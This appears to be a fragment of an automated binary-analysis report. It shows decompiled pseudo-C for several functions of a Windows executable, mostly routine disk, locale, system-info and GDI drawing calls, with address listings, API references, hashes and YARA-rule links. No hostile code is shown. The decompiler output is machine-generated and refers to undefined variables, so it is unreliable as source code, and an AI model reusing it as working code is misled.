                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ExitProcessSystemTime
                                                                                • String ID:
                                                                                • API String ID: 761356610-0
                                                                                • Opcode ID: 72045c01a493544f18e5ff251b975ec9c635fb057c52192f77df73188a0525df
                                                                                • Instruction ID: 5e413a18693b41fa715bf6f947a3acd6526992b8ed76cb55f8c02e4d4ee8bdf6
                                                                                • Opcode Fuzzy Hash: 72045c01a493544f18e5ff251b975ec9c635fb057c52192f77df73188a0525df
                                                                                • Instruction Fuzzy Hash: 26C08C8254670012EE1032750D837AE2194BB00734F364E2FFCAAA93C3E9BF06F445AB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408ACA, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00408ACA(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr _t48;
				intOrPtr _t50;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t48 = _v24;
				_t31 = E004052B0(_v28, _t48, _v16, 0);
				_t39 = _a8;
				 *_t39 = _t31;
				 *((intOrPtr*)(_t39 + 4)) = _t48;
				_t50 = _v24;
				_t34 = E004052B0(_v28, _t50, _v20, 0);
				_t40 = _a12;
				 *_t40 = _t34;
				 *((intOrPtr*)(_t40 + 4)) = _t50;
				return _t26;
			}

















                                                                                0x00408ad3
                                                                                0x00408ad8
                                                                                0x00408ada
                                                                                0x00408ada
                                                                                0x00408aed
                                                                                0x00408afc
                                                                                0x00408aff
                                                                                0x00408b0c
                                                                                0x00408b0f
                                                                                0x00408b14
                                                                                0x00408b17
                                                                                0x00408b19
                                                                                0x00408b26
                                                                                0x00408b29
                                                                                0x00408b2e
                                                                                0x00408b31
                                                                                0x00408b33
                                                                                0x00408b3c

                                                                                APIs
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408AED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1705453755-0
                                                                                • Opcode ID: 357c392e828d3b05a51e9c00f1cda4a9dbd5acae9420fcaa519de131b97c8b10
                                                                                • Instruction ID: 5b2aff7b8f22867f022bb4009e285a5176f8104054d5f896c7e10f50a27cb8b1
                                                                                • Opcode Fuzzy Hash: 357c392e828d3b05a51e9c00f1cda4a9dbd5acae9420fcaa519de131b97c8b10
                                                                                • Instruction Fuzzy Hash: 381112B5E01609AFDB00CF99C881DAFF7F9EFC8314B14C56AA509E7350E6319E018B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042D6D0, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E0042D6D0(intOrPtr __eax, intOrPtr* __edx) {
				intOrPtr _v8;
				intOrPtr _t12;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;

				_v8 = __eax;
				_t22 =  *__edx;
				_t26 = _t22 - 0x113;
				if(_t22 != 0x113) {
					_push( *((intOrPtr*)(__edx + 8)));
					_push( *((intOrPtr*)(__edx + 4)));
					_push(_t22);
					_t12 =  *((intOrPtr*)(_v8 + 0x34));
					_push(_t12);
					L00406CF8();
					 *((intOrPtr*)(__edx + 0xc)) = _t12;
					return _t12;
				}
				_push(0x42d70a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t25;
				E004037B0(_v8, _t26);
				_pop(_t21);
				 *[fs:eax] = _t21;
				return 0;
			}








                                                                                0x0042d6d9
                                                                                0x0042d6dc
                                                                                0x0042d6de
                                                                                0x0042d6e4
                                                                                0x0042d728
                                                                                0x0042d72c
                                                                                0x0042d72d
                                                                                0x0042d731
                                                                                0x0042d734
                                                                                0x0042d735
                                                                                0x0042d73a
                                                                                0x00000000
                                                                                0x0042d73a
                                                                                0x0042d6e9
                                                                                0x0042d6ee
                                                                                0x0042d6f1
                                                                                0x0042d6fb
                                                                                0x0042d702
                                                                                0x0042d705
                                                                                0x00000000

                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042D735
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: d3dc05b760a7179db27bac9aba668f17f96045aa3efb6cdb0bb9167c59736110
                                                                                • Instruction ID: 24ffc1f5cc5d95a3adb214a2426a373d53fe68e3b59a922a751631c511fbcaee
                                                                                • Opcode Fuzzy Hash: d3dc05b760a7179db27bac9aba668f17f96045aa3efb6cdb0bb9167c59736110
                                                                                • Instruction Fuzzy Hash: 90F06276A08214AFE740DF9AE891C56B7ECEB4976079140B6F904D7641D639AD008B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004206A4, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E004206A4(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v48;
				struct _SYSTEM_INFO* _t17;
				unsigned int _t20;
				unsigned int _t22;
				signed int _t31;
				intOrPtr _t33;

				_v12 = __edx;
				_v8 = __eax;
				_t17 =  &_v48;
				GetSystemInfo(_t17);
				_t33 = _v8;
				_t31 = _v12 - 1;
				if(_t31 >= 0) {
					if( *((short*)( &_v48 + 0x20)) == 3) {
						do {
							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
							 *(_t33 + _t31 * 4) = _t20;
							_t31 = _t31 - 1;
						} while (_t31 >= 0);
						return _t20;
					} else {
						goto L2;
					}
					do {
						L2:
						asm("bswap eax");
						_t22 =  *(_t33 + _t31 * 4) >> 8;
						 *(_t33 + _t31 * 4) = _t22;
						_t31 = _t31 - 1;
					} while (_t31 >= 0);
					return _t22;
				}
				return _t17;
			}











                                                                                0x004206aa
                                                                                0x004206ad
                                                                                0x004206b0
                                                                                0x004206b4
                                                                                0x004206b9
                                                                                0x004206bf
                                                                                0x004206c0
                                                                                0x004206ca
                                                                                0x004206dd
                                                                                0x004206e6
                                                                                0x004206ee
                                                                                0x004206f1
                                                                                0x004206f1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004206cc
                                                                                0x004206cc
                                                                                0x004206cf
                                                                                0x004206d1
                                                                                0x004206d4
                                                                                0x004206d7
                                                                                0x004206d7
                                                                                0x00000000
                                                                                0x004206cc
                                                                                0x004206f8

                                                                                APIs
                                                                                • GetSystemInfo.KERNEL32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042394F), ref: 004206B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoSystem
                                                                                • String ID:
                                                                                • API String ID: 31276548-0
                                                                                • Opcode ID: 447c2f892d63f2773f99d27ead267e30025e0794443dbd59af2307386bcd5138
                                                                                • Instruction ID: 2ef0218fa1a2a42b92b3f2a706405680a6ead4b34a17a53999630acefd0a4b62
                                                                                • Opcode Fuzzy Hash: 447c2f892d63f2773f99d27ead267e30025e0794443dbd59af2307386bcd5138
                                                                                • Instruction Fuzzy Hash: EBF0C2B1A0111D9FCB10DE98C48889CBBB4FA96301B81429AC404E7342EB74A960CB88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409908, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00409908(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00404374(_t10, _t18);
				}
				return E00404410(_t10, _t5 - 1,  &_v260);
			}






                                                                                0x00409913
                                                                                0x00409915
                                                                                0x0040992d
                                                                                0x00000000
                                                                                0x00409945
                                                                                0x00000000

                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409926
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 5202cd03db26926967da58f514221db7739fdaffadadf0859e52d67bb909b61f
                                                                                • Instruction ID: 5b1fc041e3763898672b66fcce577b6e5d9180f283d58c81689c33e9adf3be77
                                                                                • Opcode Fuzzy Hash: 5202cd03db26926967da58f514221db7739fdaffadadf0859e52d67bb909b61f
                                                                                • Instruction Fuzzy Hash: 8BE092B270421416D321A5595C82EE6725C9798324F00427FBE49E73C2EDB49D8082A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409954, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00409954(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






                                                                                0x00409957
                                                                                0x00409958
                                                                                0x0040996e
                                                                                0x00409975
                                                                                0x00409970
                                                                                0x00409970
                                                                                0x00409970
                                                                                0x0040997b

                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AF96,00000000,0040B1AF,?,?,00000000,00000000), ref: 00409967
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: de28bee4d669a74db4c4310b33d6665fabe231cf5f91fa0509a38d358132e406
                                                                                • Instruction ID: fec70f45c09f919bf8d4f80a38a27b4653ab8aef86a33c50036d8b13c44d48c7
                                                                                • Opcode Fuzzy Hash: de28bee4d669a74db4c4310b33d6665fabe231cf5f91fa0509a38d358132e406
                                                                                • Instruction Fuzzy Hash: 55D05EA630E2503AE310555B2D85DBB9B9CCAC67A5F11403EB589D6352D6248C06D376
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040702E, Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040702E() {

				goto ( *0x48854c);
			}



                                                                                0x00407030

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 07a2badc39eab929b4c909af6923880a3e9ada41336aa77f29b2ddf5abd41f35
                                                                                • Instruction ID: 73fe5a0cc727686ef95d4fe4dc79a2b3cd0ba68317498fb9efdab86bfa820481
                                                                                • Opcode Fuzzy Hash: 07a2badc39eab929b4c909af6923880a3e9ada41336aa77f29b2ddf5abd41f35
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420360, Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 52%
                                                                                			E00420360(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x486dc8; // 0x46b0ac
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406A58();
					_v20 = E004201BC(0);
					_push(_t177);
					_push(0x4205e0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406A50();
					_v24 = E004201BC(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x487a28; // 0x510805d2
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00406BD0();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00406BD0();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x487a28; // 0x510805d2
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00406BD0();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00406BD0();
						_v40 = _t135;
					}
					_push(_v20);
					L00406BA0();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E004205E7);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00406BD0();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406A50();
					_v24 = E004201BC(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x420433);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407250(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E004205E7);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                                                0x00420361
                                                                                0x00420363
                                                                                0x00420369
                                                                                0x0042036c
                                                                                0x0042036f
                                                                                0x00420371
                                                                                0x00420374
                                                                                0x00420377
                                                                                0x0042037b
                                                                                0x00420383
                                                                                0x0042043c
                                                                                0x0042043f
                                                                                0x00420441
                                                                                0x0042044b
                                                                                0x00420450
                                                                                0x00420451
                                                                                0x00420456
                                                                                0x00420459
                                                                                0x0042045c
                                                                                0x0042045d
                                                                                0x00420461
                                                                                0x00420462
                                                                                0x0042046c
                                                                                0x0042047c
                                                                                0x0042047f
                                                                                0x00420481
                                                                                0x00420486
                                                                                0x00420487
                                                                                0x0042048a
                                                                                0x0042048b
                                                                                0x00420490
                                                                                0x00420493
                                                                                0x00420498
                                                                                0x0042049c
                                                                                0x0042049d
                                                                                0x004204a6
                                                                                0x004204bc
                                                                                0x004204be
                                                                                0x004204c3
                                                                                0x004204c4
                                                                                0x004204c7
                                                                                0x004204c8
                                                                                0x004204cd
                                                                                0x004204a8
                                                                                0x004204a8
                                                                                0x004204ad
                                                                                0x004204ae
                                                                                0x004204b1
                                                                                0x004204b2
                                                                                0x004204b7
                                                                                0x004204b7
                                                                                0x004204d3
                                                                                0x004204d4
                                                                                0x004204f6
                                                                                0x00420518
                                                                                0x00420525
                                                                                0x00420533
                                                                                0x0042055a
                                                                                0x0042057f
                                                                                0x00420589
                                                                                0x00420593
                                                                                0x0042059c
                                                                                0x004205a6
                                                                                0x004205a6
                                                                                0x004205af
                                                                                0x004205b6
                                                                                0x004205b9
                                                                                0x004205bc
                                                                                0x004205c5
                                                                                0x004205c7
                                                                                0x004205cc
                                                                                0x004205d0
                                                                                0x004205d1
                                                                                0x004205d1
                                                                                0x004205df
                                                                                0x0042039b
                                                                                0x0042039b
                                                                                0x0042039d
                                                                                0x004203a2
                                                                                0x004203a3
                                                                                0x004203ad
                                                                                0x004203bd
                                                                                0x004203c2
                                                                                0x004203c3
                                                                                0x004203c8
                                                                                0x004203cb
                                                                                0x00420407
                                                                                0x0042040e
                                                                                0x00420411
                                                                                0x00420414
                                                                                0x00420426
                                                                                0x00420432
                                                                                0x00420432

                                                                                APIs
                                                                                • 72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 004203A3
                                                                                • SelectObject.GDI32(?,?), ref: 004203B8
                                                                                • MaskBlt.GDI32(?,?,?,?,?,?,00000000,0041F807,?,?,?,00000000,00000000,00420433,?,?), ref: 00420407
                                                                                • SelectObject.GDI32(?,?), ref: 00420421
                                                                                • DeleteObject.GDI32(?), ref: 0042042D
                                                                                • 72E7A590.GDI32(00000000,00000000,?,?), ref: 00420441
                                                                                • 72E7A520.GDI32(?,?,?,00000000,004205E0,?,00000000,00000000,?,?), ref: 00420462
                                                                                • SelectObject.GDI32(?,?), ref: 00420477
                                                                                • 72E7B410.GDI32(?,510805D2,00000000,?,?,?,?,?,00000000,004205E0,?,00000000,00000000,?,?), ref: 0042048B
                                                                                • 72E7B410.GDI32(?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0,?,00000000,00000000), ref: 0042049D
                                                                                • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0), ref: 004204B2
                                                                                • 72E7B410.GDI32(?,510805D2,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000,004205E0), ref: 004204C8
                                                                                • 72E7B150.GDI32(?,?,510805D2,000000FF,?,?,00000000,?,510805D2,00000000,?,?,?,?,?,00000000), ref: 004204D4
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004204F6
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,0041F807,?,?,00440328), ref: 00420518
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00420520
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 0042052E
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0042055A
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0042057F
                                                                                • SetTextColor.GDI32(?,0041F807), ref: 00420589
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00420593
                                                                                • SelectObject.GDI32(?,00000000), ref: 004205A6
                                                                                • DeleteObject.GDI32(?), ref: 004205AF
                                                                                • 72E7B410.GDI32(?,00000000,00000000,004205E7,?,0041F807,?,?,?,?,?,?,00000000,00000000,?,?), ref: 004205D1
                                                                                • DeleteDC.GDI32(?), ref: 004205DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                • String ID:
                                                                                • API String ID: 3348367721-0
                                                                                • Opcode ID: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction ID: e8595f71b62ae0b459171dff56d3c2f5d04765a8323d631b6e7ee7ab11d0db60
                                                                                • Opcode Fuzzy Hash: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction Fuzzy Hash: 0B81B4B1A00219AFDB50EEA9CC81FAF77FCAB0D314F51441AF618F7281C278AD508B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423754, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 51%
                                                                                			E00423754(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00422C48(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x42394f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00406E20();
					_v12 = E004201BC(0);
					_push(_v12);
					L00406A58();
					_v20 = E004201BC(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406A40();
					_v8 = _t64;
					if(_v8 == 0) {
						L18:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x423956);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407080();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406A58();
							_v16 = E004201BC(_v12);
							_push(_t127);
							_push(0x423907);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0042308C(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00406BD0();
								_push(_v16);
								L00406BA0();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00406BD0();
								_push(_v20);
								L00406BA0();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406A30();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x42390e);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}



























                                                                                0x00423755
                                                                                0x00423757
                                                                                0x0042375d
                                                                                0x0042375f
                                                                                0x00423761
                                                                                0x00423765
                                                                                0x0042376a
                                                                                0x0042395f
                                                                                0x00423784
                                                                                0x00423786
                                                                                0x0042378d
                                                                                0x00423792
                                                                                0x00423797
                                                                                0x00423798
                                                                                0x0042379d
                                                                                0x004237a0
                                                                                0x004237a3
                                                                                0x004237a5
                                                                                0x004237af
                                                                                0x004237b5
                                                                                0x004237b6
                                                                                0x004237c0
                                                                                0x004237c3
                                                                                0x004237c5
                                                                                0x004237c7
                                                                                0x004237cc
